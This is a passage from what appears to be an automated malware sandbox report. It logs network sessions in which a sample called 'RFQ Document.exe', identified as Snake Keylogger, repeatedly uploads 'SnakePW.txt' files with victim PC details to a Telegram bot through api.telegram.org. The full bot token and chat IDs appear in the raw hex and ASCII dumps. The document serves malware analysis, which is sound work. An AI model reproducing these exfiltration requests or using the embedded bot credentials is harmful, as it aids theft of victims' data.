                                            Data Ascii: {"ok":true,"result":{"message_id":12808,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            223192.168.2.450044149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:33 UTC354OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ed07eda7
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:33 UTC354OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 30 37 65 64 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ed07eda7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:33 UTC355INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:33 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:33 UTC355INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12809,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            224192.168.2.450045149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:33 UTC356OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ed249e37
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:33 UTC356OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 32 34 39 65 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ed249e37Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:33 UTC356INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:33 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:33 UTC357INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12810,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            225192.168.2.450046149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:33 UTC357OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ed3c6155
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:33 UTC358OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 33 63 36 31 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ed3c6155Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:33 UTC358INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:33 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:33 UTC358INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12811,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            226192.168.2.450047149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:33 UTC359OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ed5b5f3d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:33 UTC359OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 35 62 35 66 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ed5b5f3dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:33 UTC360INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:33 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:33 UTC360INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12812,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            227192.168.2.450048149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:33 UTC360OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ed7a5e75
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:33 UTC361OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 37 61 35 65 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ed7a5e75Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:34 UTC361INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:34 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:34 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12813,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            228192.168.2.450049149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:34 UTC362OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ed995e14
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:34 UTC362OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 39 39 35 65 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ed995e14Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:34 UTC363INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:34 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:34 UTC363INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12815,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808774,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            229192.168.2.450050149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:34 UTC364OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255edb5f876
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:34 UTC364OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 62 35 66 38 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255edb5f876Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:34 UTC364INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:34 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:34 UTC365INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12816,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808774,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            23192.168.2.449797149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:25 UTC36OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c4957484
                                            Host: api.telegram.org
                                            Content-Length: 407
